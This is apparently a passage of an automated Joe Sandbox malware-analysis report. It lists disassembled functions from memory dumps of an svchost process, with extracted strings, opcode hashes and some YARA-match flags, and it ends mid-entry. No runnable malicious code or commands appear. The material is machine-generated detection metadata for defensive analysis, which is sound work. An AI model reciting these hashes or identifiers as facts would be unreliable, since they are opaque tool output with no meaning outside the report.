                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                      • Opcode ID: 2ad413bc5720362b710a96df999ec5f784e0897365ed4b9bb0e1843d07158d71
                                                                                                                      • Instruction ID: 36db638c617d30f561691dac185fdbb8f9ae39d5bf112473ba0cc460dfde8038
                                                                                                                      • Opcode Fuzzy Hash: 2ad413bc5720362b710a96df999ec5f784e0897365ed4b9bb0e1843d07158d71
                                                                                                                      • Instruction Fuzzy Hash: CD714CB5A022499FDB05DF99D990BEEB7F8AF48304F154065E905AB251E734EE01CB60
                                                                                                                      Function 030D705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                      • String ID: kLsE
                                                                                                                      • API String ID: 3446177414-3058123920
                                                                                                                      • Opcode ID: c5b14107be8d9bdf79a7411e76144f66b11465d419aa3a7a0e89c3c812590834
                                                                                                                      • Instruction ID: d3bcd14fdd87b5e7c1a76ea7c133babe748407790044ce02320346a5d8f82050
                                                                                                                      • Opcode Fuzzy Hash: c5b14107be8d9bdf79a7411e76144f66b11465d419aa3a7a0e89c3c812590834
                                                                                                                      • Instruction Fuzzy Hash: 80417835503355ABE739FF69E844BA97FD4AB94B24F180218EDA05E0C9CBB444E1CBB0
                                                                                                                      Function 030452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@
                                                                                                                      • API String ID: 0-149943524
                                                                                                                      • Opcode ID: ed5742b7fc386b1f02eed35198a16b3634be804ab00d896017dc95dc5212d987
                                                                                                                      • Instruction ID: 94da3ed9091d03cbd090d1bdbc487e455519825d047a9723186c8904469f788f
                                                                                                                      • Opcode Fuzzy Hash: ed5742b7fc386b1f02eed35198a16b3634be804ab00d896017dc95dc5212d987
                                                                                                                      • Instruction Fuzzy Hash: D132CCB450A3118BDB64CF18C880B7EF7E5EF8A754F18492EF8859B290E735CA40DB52
                                                                                                                      Function 030FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction ID: 74c32048e5223b09b5b3781b9a14089fe07b4505e6c2b11b50afed0a765aaebe
                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction Fuzzy Hash: 1BC1AC313053469FDB24CE28C841B6BFBE5AFC4718F088A2DF6998AA90D775E505CF91
                                                                                                                      Function 03030CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Failed to retrieve service checksum., xrefs: 0308EE56
                                                                                                                      • ResIdCount less than 2., xrefs: 0308EEC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                      • API String ID: 0-863616075
                                                                                                                      • Opcode ID: 8bab86664d87b68e2214b65bd5d69528c9a9c4af3cb3399ae4838d84e733601c
                                                                                                                      • Instruction ID: dcd40f970afcf2de9ff8b21b913d212df072cdc292f5f84b987ab76a1180f8e3
                                                                                                                      • Opcode Fuzzy Hash: 8bab86664d87b68e2214b65bd5d69528c9a9c4af3cb3399ae4838d84e733601c
                                                                                                                      • Instruction Fuzzy Hash: C8E1E2B59097449FE364CF16C440BABFBE4FB88314F008A2EE5D99B280DB719949CF56
                                                                                                                      Function 030AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      • Opcode ID: 9e864c4620a0807afcc3be1fa4f3ec4afa3afd3dab6d7b8b06273dfb44d16673
                                                                                                                      • Instruction ID: 0fd0be90e73294918a1809736df0a6ee29e5374d3964a9323cdd66c8d20cffee
                                                                                                                      • Opcode Fuzzy Hash: 9e864c4620a0807afcc3be1fa4f3ec4afa3afd3dab6d7b8b06273dfb44d16673
                                                                                                                      • Instruction Fuzzy Hash: 81613C71E02B189FDB24DFACD980BAEBBF9FB48700F144469E559EB291D731A940CB50
                                                                                                                      Function 0304F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$
                                                                                                                      • API String ID: 0-233714265
                                                                                                                      • Opcode ID: f58a54301a731edd541b7dbe3d45ac228a6a6304ec0eb20be266f6acdd08a518
                                                                                                                      • Instruction ID: c29beed32028588c604be3680e5eddc318c42b0e0f9f54163c542693ab0436f1
                                                                                                                      • Opcode Fuzzy Hash: f58a54301a731edd541b7dbe3d45ac228a6a6304ec0eb20be266f6acdd08a518
                                                                                                                      • Instruction Fuzzy Hash: B7619CB5A0274ADFDB20DFA4C580BADB7F6FF88704F184469D515AF680CB74AA41CB90
                                                                                                                      Function 0303A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0303A309
                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0303A2FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                      • API String ID: 0-2876891731
                                                                                                                      • Opcode ID: 50a24fc62a54443e8ab4c01b2c5765f568b247b54cb3ebba406c260d88fab3a3
                                                                                                                      • Instruction ID: 673e30ff316efe91527e8f6917ca230a34723ddb313d68a85399e9ac601415c6
                                                                                                                      • Opcode Fuzzy Hash: 50a24fc62a54443e8ab4c01b2c5765f568b247b54cb3ebba406c260d88fab3a3
                                                                                                                      • Instruction Fuzzy Hash: 9041AE75B06649EBDB11CF69C840BAEB7F8EF86700F1844A6EC44DB291E335D940CB55
                                                                                                                      Function 0306329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local\$@
                                                                                                                      • API String ID: 0-380025441
                                                                                                                      • Opcode ID: fca41c4d8a20400462e3d75e5e5dcf7f8bfbd88216bedbce57d913b0c2cac52a
                                                                                                                      • Instruction ID: 76e552285e4c492136d58ec36078f4f0a96119e3ba52b5520ad7d98ac0e8c698
                                                                                                                      • Opcode Fuzzy Hash: fca41c4d8a20400462e3d75e5e5dcf7f8bfbd88216bedbce57d913b0c2cac52a
                                                                                                                      • Instruction Fuzzy Hash: 8631B5B950A314AFC350DF28C880A9FBBE8FBC5654F48096EF59587260DA31DD04CBD6
                                                                                                                      Function 0303C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      • Opcode ID: 7bf55cb3bf180ef34fd9dd0b2054c6a866b5ac7481d7aa0351c8ed8f95cec5b8
                                                                                                                      • Instruction ID: 41b360a012ad704890f08f87c5cb7d97f6583d1cdd0696e569322382d3d3a43f
                                                                                                                      • Opcode Fuzzy Hash: 7bf55cb3bf180ef34fd9dd0b2054c6a866b5ac7481d7aa0351c8ed8f95cec5b8
                                                                                                                      • Instruction Fuzzy Hash: 28823B75E022189FEB64CFA9C880BEDF7B9BF4A710F188569E859EB250D7309D41CB50
                                                                                                                      Function 03082F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P`vRbv
                                                                                                                      • API String ID: 0-2392986850
                                                                                                                      • Opcode ID: 997acb0f6f0a70ad5395fda872c8f8e98442976c040c4eed067f8ddd5f305a5e
                                                                                                                      • Instruction ID: 8eb03598a5477123ba49a4b47124b7277ac4f49a31b20cb0d783775c84f33972
                                                                                                                      • Opcode Fuzzy Hash: 997acb0f6f0a70ad5395fda872c8f8e98442976c040c4eed067f8ddd5f305a5e
                                                                                                                      • Instruction Fuzzy Hash: E542037DD06259AADF69EFA8C4446BDFBF4AF84B10F1C84DAD4C1AB280D7348981CB54
                                                                                                                      Function 03037370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f7290d9976037c7302f9c7bdb418432e0892c74d41a307eb5c01d30e02e334fc
                                                                                                                      • Instruction ID: 9c55e86f81da92d8406052f1445668c28662378fbc2726e2842738ad701a9e1a
                                                                                                                      • Opcode Fuzzy Hash: f7290d9976037c7302f9c7bdb418432e0892c74d41a307eb5c01d30e02e334fc
                                                                                                                      • Instruction Fuzzy Hash: 37A18BB5609342CFD724DF28C480A2BBBE9BF89704F144DAEE5858B350E770E945CB92
                                                                                                                      Function 03052E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: 45d270b4249ea05a8b60fe3cc8b30fa7e6f64d650bbb1fc19cfa406b4d7b5a50
                                                                                                                      • Instruction ID: c9c990d346957b71609c863fe5594e40f0f6758b64353e1e3267419fa2d1bec4
                                                                                                                      • Opcode Fuzzy Hash: 45d270b4249ea05a8b60fe3cc8b30fa7e6f64d650bbb1fc19cfa406b4d7b5a50
                                                                                                                      • Instruction Fuzzy Hash: 27F19D7960A745CFDB65CF28C490B6BBBE5AFC8650F0948ADFC898B240DB30D945CB52
                                                                                                                      Function 026765CE Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 5f9f1aa0eb84752cddd4c78341f19f6891ef913887164c34dd815df12519fd22
                                                                                                                      • Instruction ID: c62f6de77ca3e51250bc408cac1ab07cc1dc9cb57e596dee7516bd41a39cf517
                                                                                                                      • Opcode Fuzzy Hash: 5f9f1aa0eb84752cddd4c78341f19f6891ef913887164c34dd815df12519fd22
                                                                                                                      • Instruction Fuzzy Hash: A5021DB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                      Function 026765D3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                      • Instruction ID: a80fb48ff9b5f1dc694ce1bd30a814edce6b7495e06b33283d50fb072d925990
                                                                                                                      • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                      • Instruction Fuzzy Hash: 44021DB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                      Function 03032FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PATH
                                                                                                                      • API String ID: 0-1036084923
                                                                                                                      • Opcode ID: 6b0f4356fd5f45d6058e969ed26c421ba4aca574b10a23ee9908bf6f4807d2a3
                                                                                                                      • Instruction ID: f12b9066f80884d7e8461151aad89192b376d44345807cd6525409e251b5d07b
                                                                                                                      • Opcode Fuzzy Hash: 6b0f4356fd5f45d6058e969ed26c421ba4aca574b10a23ee9908bf6f4807d2a3
                                                                                                                      • Instruction Fuzzy Hash: A9F1D179D01218EBCB29DF99D8C0AFEB7F9FF89700F488069E440AB250D774A851CB65
                                                                                                                      Function 0306F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b6691219204ef17abf47fcd7ba50f7694c779ed52d21331702df701de592591c
                                                                                                                      • Instruction ID: 454d07413ffc4edff9aaa9554223aa7fab8f2504b92fa923bb225e516691f2da
                                                                                                                      • Opcode Fuzzy Hash: b6691219204ef17abf47fcd7ba50f7694c779ed52d21331702df701de592591c
                                                                                                                      • Instruction Fuzzy Hash: F14158B4D01288EFDB24DFA9D880AEEFBF4FB48300F14856EE859A7215D7319950CB60
                                                                                                                      Function 03030100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: f04ebcaffb36684a662232892a12bffc9cc331a60a9eb45958f4f3e46abc91e6
                                                                                                                      • Instruction ID: e41e1c701bcdcd0ceaaf26b7c177fc6dc3fe64e65673281a147513ff365b5ba2
                                                                                                                      • Opcode Fuzzy Hash: f04ebcaffb36684a662232892a12bffc9cc331a60a9eb45958f4f3e46abc91e6
                                                                                                                      • Instruction Fuzzy Hash: C5A11A75A0B3686BDF68DB29C840BFEA7ED5F86304F0844E9EDC76B281C6748940CB55
                                                                                                                      Function 02662510 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: yxxx
                                                                                                                      • API String ID: 0-3567846162
                                                                                                                      • Opcode ID: 0937f77d1c0f158731997e5769b8fc24c42e3f008b3281df7c94a24dc7d8a289
                                                                                                                      • Instruction ID: ca3834b7427786f6f4484e4652be8c6dd31b450c240cfeb3da80a2d416befb50
                                                                                                                      • Opcode Fuzzy Hash: 0937f77d1c0f158731997e5769b8fc24c42e3f008b3281df7c94a24dc7d8a289
                                                                                                                      • Instruction Fuzzy Hash: 8481C472B0050A4BCB1C8E6DCCB57B977A2EBD4218F28823ADD56CB791E634ED518780
                                                                                                                      Function 0306A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      • API String ID: 0-1106856819
                                                                                                                      • Opcode ID: b12f146b2d4703e31bd5cdfb87f18b4205055b8d51d73d803e69ffff66fd635b
                                                                                                                      • Instruction ID: e49cf152f8883171c88ea49c6e1a809be28bfb7f107a175d531bdf996004ca1e
                                                                                                                      • Opcode Fuzzy Hash: b12f146b2d4703e31bd5cdfb87f18b4205055b8d51d73d803e69ffff66fd635b
                                                                                                                      • Instruction Fuzzy Hash: D6717075E0260ADFDF68DF9CE5906EEBBF5BF48700F18856AE805AB244D7328941CB50
                                                                                                                      Function 0303973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                      • Instruction ID: 95f9c03d16eb5fd41f35a9306944a51a679dd051e46857a58ec60d9933fde80c
                                                                                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                      • Instruction Fuzzy Hash: 79615B75D02219ABDF21DF99C840BEEFBFCEF85714F14496AE810A7290D7749A01DBA0
                                                                                                                      Function 0266256C Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: yxxx
                                                                                                                      • API String ID: 0-3567846162
                                                                                                                      • Opcode ID: 2b2e82a1baca5a3c0b3c99f23283d03d8f4cc9a916272bc9bbcb6dce9adae0a8
                                                                                                                      • Instruction ID: 3e5c0f2b4b91d8dbf5acb2f332bd523d1038b69153e025df3b027b4eaab1ddf1
                                                                                                                      • Opcode Fuzzy Hash: 2b2e82a1baca5a3c0b3c99f23283d03d8f4cc9a916272bc9bbcb6dce9adae0a8
                                                                                                                      • Instruction Fuzzy Hash: D751A372B105064BCB1C8E6DCCB53B9B6A2FB94218F68923DED56CB391EA34ED518740
                                                                                                                      Function 030BF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                      • Instruction ID: 1c0bc35c4426eebf990ac5f5b4721e2764ca68dafe18bccfb8ed8a834f8e663b
                                                                                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                      • Instruction Fuzzy Hash: 24517876616306AFD721DF54CC40FAAB7F8FB84750F040929B9809B290D7B5ED14CB96
                                                                                                                      Function 0304E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      • API String ID: 0-1948896318
                                                                                                                      • Opcode ID: f8d93ed12977b5d9e9e1802d56151f173b2706f689e5d3ccfec7ed1ca438c831
                                                                                                                      • Instruction ID: 3d4f57a98735b78ad0c5187f51d04d5590476fd2813bdd6fbcfcf8b2b77a3f55
                                                                                                                      • Opcode Fuzzy Hash: f8d93ed12977b5d9e9e1802d56151f173b2706f689e5d3ccfec7ed1ca438c831
                                                                                                                      • Instruction Fuzzy Hash: 65415EB650A3119BD710DA65C984BAFB7E8BF88714F440D39F984DB180E774DA04C796
                                                                                                                      Function 030EB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PreferredUILanguages
                                                                                                                      • API String ID: 0-1884656846
                                                                                                                      • Opcode ID: d2d85bef1ef9940b388b9d4f83440c9ea70c57be7fcb2e5f45bb071c4eb54a8e
                                                                                                                      • Instruction ID: 70a05504b3309c5b10be8e8a00fd0dbd427387c3b867f05ae1e00f0eabce5d70
                                                                                                                      • Opcode Fuzzy Hash: d2d85bef1ef9940b388b9d4f83440c9ea70c57be7fcb2e5f45bb071c4eb54a8e
                                                                                                                      • Instruction Fuzzy Hash: 4841E476E06219AFCF11DAA8C841BEEF7B9EF84710F050566E911FB254D6B0DE40C7A4
                                                                                                                      Function 030AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      • API String ID: 0-2202222882
                                                                                                                      • Opcode ID: 6829e7c5f9394e8aa8b4a7edbcc458e50df3284faad2a2541d3ed1a084affb25
                                                                                                                      • Instruction ID: 791806b1309eb78c20f83f882b001ef1764ce0825e14a82a1d952ed3ea1dc910
                                                                                                                      • Opcode Fuzzy Hash: 6829e7c5f9394e8aa8b4a7edbcc458e50df3284faad2a2541d3ed1a084affb25
                                                                                                                      • Instruction Fuzzy Hash: CB4145B5D0262CABEB21DB94DC84FDEB77CAB44714F0145E5A608AB140DB709E498F94
                                                                                                                      Function 030B97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: verifier.dll
                                                                                                                      • API String ID: 0-3265496382
                                                                                                                      • Opcode ID: fb40c903c5e2489212132e07b1a50d761a81bf1f02235bce080c02875a91b296
                                                                                                                      • Instruction ID: 4d2259253a0eb1bb727564406aa9c18fb32999efd0e6e68c0a77c2ac7fd5b5c6
                                                                                                                      • Opcode Fuzzy Hash: fb40c903c5e2489212132e07b1a50d761a81bf1f02235bce080c02875a91b296
                                                                                                                      • Instruction Fuzzy Hash: F8317375A01301AFDB64DF699890BB6B7F6EB8D710F588479E609DF2C1E7318C8087A4
                                                                                                                      Function 03035096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
